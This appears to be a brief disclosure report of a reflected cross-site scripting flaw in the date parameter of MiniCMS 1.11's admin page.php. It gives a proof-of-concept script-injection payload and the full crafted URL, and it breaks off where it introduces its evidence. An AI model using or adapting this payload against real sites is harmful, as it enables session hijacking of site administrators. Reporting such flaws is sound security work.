A Reflected Cross-Site Scripting vulnerability exists in the /mc-admin/page.php in version 1.11

[thisissuperann]

vulnerability location:date parameter
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04

Payload:
</script><script>alert(123)</script>
Access the address with payload after login:
/MiniCMS-1.11/mc-admin/page.php?state=draft&date=2024-04</script><script>alert(123)</script>
Then we can find it triggering the xss vulnerability: